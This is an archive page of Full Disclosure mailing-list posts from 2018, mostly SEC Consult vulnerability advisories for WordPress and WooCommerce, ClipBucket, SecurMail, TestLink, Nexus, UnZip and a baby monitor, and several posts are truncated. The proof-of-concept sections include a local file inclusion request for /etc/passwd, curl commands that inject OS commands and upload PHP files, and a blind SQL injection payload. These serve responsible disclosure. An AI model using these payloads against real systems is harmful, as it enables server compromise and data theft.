- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)

2018-03-14 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
  title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
 vulnerable version: 1.1.9
  fixed version: 2.2.0
 CVE number: (requested but not yet received)
 impact: Critical
   homepage: https://pluginus.net/
  found: 2018-02-20
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike
most of the big companies on the net, we believe in individual approach to
every our customer. Web development is our passion and we always try to go an
extra mile over our clients' expectations.

Our team specializes in development of WordPress plugins. It's always exciting
to try new technologies and approaches to get the project done and impress
clients by realization of their ideas!"

Source: https://pluginus.net/about-us/


Business recommendation:

SEC Consult recommends to ugprade to the latest version available
as soon as possible. Further detailed security tests should be performed
in order to identify potential other security issues.


Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implemented a page redraw AJAX function accessible to anyone
without any authentication.

WordPress shortcode markup in the "shortcode" parameters would be evaluated.
Normally unauthenticated users can't evaluate shortcodes as they are often
sensitive.

Additionally, it is noted that there are other implemented shortcodes that are
being used in this plugin which can be abused through the same attack. Worst,
some of them could lead to remote code execution.


2. Local File Inclusion
The vulnerability is due to the lack of args/input validation on render_html
before allowing it to be called by extract(), a PHP built-in function. Because
of this, the supplied args/input can be used to overwrite the $pagepath
variable which then could lead to local file inclusion attack.


Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the code execution vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof&shortcode=<>


2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the local file inclusion vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof&shortcode=woof_search_options pagepath=/etc/passwd


Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and
found to be vulnerable.


Vendor contact timeline:

2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory


Solution:
-
The vendor provides an updated version and users are urged to upgrade to version
2.2.0 immediately:

https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your applicatio

[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

2018-03-13 Thread Vulnerability Lab 
Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

URL:
https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3

#bugbounty #security #research #infosec

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PayPal Inc - New Venmo Bug Bounty Program

2018-03-13 Thread Vulnerability Lab 
Title: PayPal Inc - New Venmo Bug Bounty Program

URL:
https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail

2018-03-12 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
  title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
 vulnerable version: 9.1.501
  fixed version: 9.2.501 or hotfix patch "1_012018"
 CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
 CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
 impact: Critical
   homepage: https://www.securenvoy.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm


Business recommendation:

During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.

These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.

As other SecureEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.


Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this, 
cross
site scripting cannot be exploited on these pages in most browsers.


2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.

Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!


3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.


4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.


5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.


Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.


Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragments demonstrates reflected cross site scripting
   (CVE-2018-7703):

--- snip ---

  
  

--- snip ---

b) E-mails that are sent using the HTML format can contain any

[FD] SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management

2018-02-28 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
  title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
 vulnerable version: <1.9.17
  fixed version: 1.9.17 (after November 2017), and the current
 "testlink_1_9" branch
 CVE number: -
 impact: Medium
   homepage: http://testlink.org/
  found: 2017-09-22
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"TestLink is a web based test management and test execution system.
It enables quality assurance teams to create and manage their test
cases as well as to organize them into test plans. These test plans
allow team members to execute test cases and track test results
dynamically."

Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code


Business recommendation:

SEC Consult advises to immediately install the available updates as attackers
might gain access to sensitive data belonging to other users.

A thorough security review performed by security professionals is highly
recommended in order to identify potential further security deficiencies.


Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced 
by
different test cases. By using a simple ID iterator, all produced output
data can be gathered from the whole system.

The actual impact strongly depends on the classification of the produced data
which is referenced. Therefore, the risk can vary from low to critical
depending on the use case.


Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment
by using the following url:
http:///lib/attachments/attachmentdownload.php?skipCheck=1&id=

The tag  specifies the target address and can also include a sub-
folder where the hosted TestLink application is located.


Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that
older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14


Vendor contact timeline:

2017-10-18: Contacting vendor through http://mantis.testlink.org
Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for
1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test
instance) and that it can be verified easily with the PoC
2018-01-09: Asked for status update; No answer.
2018-01-29: Asked for status update; No answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the
advisory.
2018-02-19: Asked the vendor for reachable test-instance, reply: there is
no test instance
2018-02-28: Public release of security advisory


Solution:
-
Check-out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/

The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d

Upgrade to 1.9.17 (after November 2017).


Workaround:
---
Restrict network access and do not expose the TestLink interface to the
internet.


Advisory URL:
-----
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers.

[FD] SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket

2018-02-27 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
  title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
 vulnerable version: <4.0.0 - Release 4902
  fixed version: 4.0.0 - Release 4902
 CVE number: -
 impact: critical
   homepage: http://clipbucket.com/
  found: 2017-09-06
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a 
serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

 $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>"
http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| <>" "http://$HOST/actions/file_downloader.php";


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php";

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php";

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg";


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE &quo

[FD] SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors

2018-02-21 Thread SEC Consult Vulnerability Lab 
We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180221-0 >
===
  title: Hijacking of arbitrary video baby monitors
product: miSafes Mi-Cam remote video monitor
 vulnerable version: Android application v1.2.0, iOS v1.0.5
 Firmware v1.0.38
  fixed version: -
 CVE number: -
 impact: critical
   homepage: http://www.misafes.com/mi-cam
  found: 2017-11-30
 by: Mathias Frank (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy
set up & use, two-way talk and supports free local video recording, all can be
use by our user friendly Mi-Cam app."

Source: http://www.misafes.com/mi-cam


Business recommendation:

SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved! Although cloud-connected hardware may have an advantage regarding
usability and convenience for users, if security is lacking those products pose
a great risk for all customers.

Furthermore, it seems there exist similar products from other vendors, e.g.
"Qihoo 360 Smart Home Camera", that look exactly the same and may also be
affected but SEC Consult could not verify this. The cloud component hosted by
"qiwocloud2.com" may be used by other products as well. Additional information
regarding other vendors are described in our blog post linked at the top of this
advisory.


Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application,
involves numerous requests to a cloud infrastructure available at
ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor 
or
respective Android application.

The Android application has at least 5-10 installations according to
Google Play Store with potentially as many iOS users as well.

SEC Consult has identified multiple critical security issues within this 
product.


1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the
video baby monitor involves several different API calls. A number of critical 
API
calls can be accessed by an attacker with arbitrary session tokens because of
broken session management.

This allows an attacker to retrieve information about the supplied account
and its connected video baby monitors. Information retrieved by this feature
is sufficient to view and interact with all connected video baby monitors for
the supplied UID.


2) Missing Password Change Verification Code Invalidation
The password forget functionality sends a 6-digit validation key which is valid
for 30 minutes to the supplied email address in order to set a new password.
Multiple codes can be requested though while previously delivered codes do not 
get
invalidated and anyone of them can be used as a valid key. This can easily
be brute-forced to take over other accounts.


3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface where an
attacker is able to get hardware level access to the device and for instance
extract the firmware for further analysis. SEC Consult identified further 
security
issues such as outdated software (issue 6) or weak passwords (issue 4) by
analyzing the firmware using IoT Inspector (https://www.iot-inspector.com).


4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default
credentials with only 4 digits.


5) Enumeration of user accounts
The password reset functionality leaks information about the existence of
supplied user accounts which can aid in further (brute-force) attacks.


6) Outdated and Vulnerable Software
Several software components which are affected by publicly known
vulnerabilities were identified in the firmware of the video baby monitor.


Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed we will omit
detailed proof of concept information in this advisory.


1) Broke

[FD] SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro

2018-02-08 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
  title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
 vulnerable version: <=2.14.5, <=3.7.1
  fixed version: 2.14.6, 3.8.0
 CVE number: CVE-2018-5306, CVE-2018-5307
 impact: Medium
   homepage: https://www.sonatype.com/
  found: 2017-12-12
 by: Werner Schober, Daniel Ostovary (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open
source software development. From our humble beginning as core contributors
to Apache Maven, to supporting the world’s largest repository of open source
components (Central), to distributing the world's most popular repository
manager (Nexus), we exist for one simple reason; to help accelerate software
innovation."

Source: https://www.sonatype.com/about-sonatype


Business recommendation:

The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities
which could be used by an attacker to execute JavaScript code in the user's
browser.

The vendor provides a patch for both version 2 and 3 of the product which should
be installed immediately.

It is recommended to conduct a thorough security review by IT security
professionals in order to identify potential other security issues.


Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function
are vulnerable to reflected XSS. If the attacker can lure a user into
clicking a crafted link he could execute arbitrary JavaScript code.
In case the user has sufficient permissions, an attacker can create arbitrary
(administrative) users or perform stored XSS attacks (see 2).


2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities,
which are described in the following list.

2.1) The first one is located in the "File Upload" functionality of
the "Staging Upload". Uploading a file with JavaScript code
in its name allows to store JavaScript code, which gets
triggered every time the file name is shown (e.g. in "Repositories").

2.2) The second stored XSS vulnerability is more precisely
being considered as stored DOM injection. This vulnerability
affects the functionality of creating a new user. When doing
so it is possible to inject JavaScript/HTML code in the username,
which later gets rendered/executed every time the username is
displayed.

2.3) The third stored XSS vulnerability is also a stored DOM injection.
It affects the "IQ Server Connection"/"IQ Server Dashboard"
functionality. The "IQ Server URL" field in the "IQ Server
Connection" allows to inject JavaScript/HTML code into the
menu bulletpoint "IQ Server Dashboard".


The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2


Proof of concept:
-
1) Reflected XSS vulnerability
By luring an attacker into clicking the following link, an arbitrary
JavaScript payload will be executed:

https://example.com/nexus/service/siesta/healthcheck/healthCheckFile
Detail/.../index.html?repoId=public&format=sectest

Vulnerable parameters:
-) repoId
-) format

2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities
are susceptive to the following stored XSS vulnerabilities.***

2.1)
The staging upload allows an attacker to upload a file, which contains a
JavaScript payload in the filename. An example for a filename containing a
"malicious" payload is as follows: ".jpg"

This file can be uploaded flawlessly and everytime the filename is displayed,
the JavaScript payload gets executed.

2.2)
An attacker is able to create a new user, which contains a malicious JavaScript
payload in the username. As an example the following username can be used:

"EvilAdmin Create Repository -> Access repository via "Repositories" ->
JavaScript code is being executed)

2.3)
The nexus server allows to setup an IQ server connection. The server name is not
validated and therefore allows the permanent injection of JavaScript code. To
demons

[FD] SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip

2018-02-07 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 >
===
  title: Multiple buffer overflow vulnerabilities
product: InfoZip UnZip
 vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22
  fixed version: 6.10c23
 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133
 CVE-2018-134,CVE-2018-135
 impact: high
   homepage: http://www.info-zip.org/UnZip.html
  found: 2017-11-03
 by: R. Freingruber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"UnZip is an extraction utility for archives compressed in .zip format (also
called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and
PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our
primary objectives have been portability and non-MSDOS functionality.
UnZip will list, test, or extract files from a .zip archive, commonly found
on MS-DOS systems. The default behavior (with no options) is to extract into
the current directory (and subdirectories below it) all files from the
specified zipfile."

Source: http://www.info-zip.org/UnZip.html

InfoZip's UnZip is used as default utility for uncompressing ZIP archives
on nearly all *nix systems. It gets shipped with many commerical products on
Windows to provide (un)compressing functionality as well.


Business recommendation:

InfoZip Unzip should be updated to the latest available version.


Vulnerability overview/description:
---
1) Heap-based buffer overflow in password protected ZIP archives 
(CVE-2018-135)

InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing
password protected ZIP archives. An attacker can exploit this vulnerability
to overwrite heap chunks to get arbitrary code execution on the target system.

For newer builds the risk for this vulnerability is partially mitigated
because modern compilers automatically replace unsafe functions with length
checking variants of the same function (for example sprintf gets replaced
by sprintf_chk). This is done by the compiler at locations were the length
of the destination buffer can be calculated.

Nevertheless, it must be mentioned that UnZip is used on many systems
including older systems or on exotic architectures on which this protection
is not in place. Moreover, pre-compiled binaries which can be found on the
internet lack the protection because the last major release of InfoZip's
UnZip was in 2009 and compilers didn't enable this protection per default at
that time. The required compiler flags are also not set in the Makefile of
UnZip. Compiled applications are therefore only protected if the used compiler
has this protection enabled per default which is only the case with modern
compilers.

To trigger this vulnerability (and the following) it's enough to uncompress
a manipulated ZIP archive. Any of the following invocations can be used to
trigger and abuse the vulnerabilities:

>unzip malicious.zip
>unzip -p malicious.zip
>unzip -t malicious.zip

2) Heap-based out-of-bounds write (CVE-2018-131)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap-based out-of-bounds write if the
archive filename does not contain a .zip suffix.

3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which
can be used to write null-bytes out-of-bound when converting
attacker-controlled strings to the local charset.

4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap out-of-bounds access
vulnerability.

5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA
implementation. Various crash dumps have been supplied to the vendor
but no further analysis has been performed.


Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives 
(CVE-2018-135)

Unzipping a malicious archive results in the following output:
(On Ubuntu 16.04 with Un

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab 
Am 30.01.2018 um 15:43 schrieb Jeffrey Walton:
> On Tue, Jan 30, 2018 at 9:22 AM, Vulnerability Lab
>  wrote:
>> Am 30.01.2018 um 15:18 schrieb Jeffrey Walton:
>>> On Tue, Jan 30, 2018 at 4:08 AM, Vulnerability Lab
>>>  wrote:
>>>> Document Title:
>>>> ===
>>>> Banknotes Misproduction security & biometric weakness
>>>> ...
>>>>
>>>> Technical Details & Description:
>>>> 
>>>> In the last months we reviewed the new 20€ & 50€ Banknotes of the European 
>>>> Central Bank. One of our core team researchers identified
>>>> that for the security sign of the holograms are different components in 
>>>> usage. The security signs are build by the European Central
>>>> Bank with several high profile elements in the signs to ensure, that the 
>>>> banknotes has a serious level of protection again fraud or
>>>> fake money. After processing some time to identify an impact, we were 
>>>> finally able to identify the following security problematic ...
>>>>
>>> The details seem to be missing from the announcement and the website.
>>
>> read the linked full document as pdf
> Thanks. There is no linked PDF.

In the references section is the download available.

- atu

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab 
Am 05.02.2018 um 16:10 schrieb Vulnerability Lab:
> Hello Intern0t (inter...@protonmail.com),
> could you please tell me what your strange blabla has to deal with the
> fact that the hologram can be read and accepted as fingerprint because
> of the polipaper inside. Did you see that we changed the finger after
> the save due to the register. If you believe in that this is normal
> behavour or a troll issue, please ask lenovo. They included there
> universal fingerprint from a mark insde a laptop. We figured out by now
> that the hologram can be read to finally bypass with a universal key.
> Thus strange anomaly should for sure not be possible in scans that must
> identify a hologram. If your technical expertise is not high level
> enough then to talk seriously about the issues impact, i cant help you.
>
> Best Regards,
> Vulnerability Laboraotry,

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab 
Am 31.01.2018 um 17:21 schrieb Vulnerability Lab:
> Hello Ben Tasker,
> sorry if the title of the issue did lead you to misunderstand the
> article. The currency is still secure.
> The title refers to the information used for the issue. In case it was
> misleading we will update it but you was the first who misunderstood
> the article by comments.
>
> "The weakness, the theory goes, is that someone could register a
> "fingerprint" in your system by using a banknote. This'd give them
> access whilst also meaning you didn't at least have a hash of their
> real fingerprint for forensics to find."
> This is correct. Also the problem that others can access with the same
> hologram into for exmaple the high protected area (mil & gov).
>
>
> "Another theory is that users might opt to use a banknote instead of
> their own fingerprint. I'm not quite sure what the likelihood of that
> is, in that it's not exactly convenient, and if you're concerned about
> privacy implications from a fingerprint scanner the best option is not
> to use it."
>
> What about, if the fingerprint of lenovo (bug disclosed parallel to
> us) is our european currency. Means the hardcoded fingerprints that
> published parallel is exactly what we refer to when we talk about a
> universal fingerprint. In the real life it is pretty easy to use it in
> large companies due to the registration and as well on entrance. Maybe
> you feel like the pratical interaction can not happen, we can confirm
> you from germany we was successful. The government disallowed us to
> register the fingerprint to the real system otherwise a compromise
> could not be excluded.

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range

2018-02-01 Thread SEC Consult Vulnerability Lab 
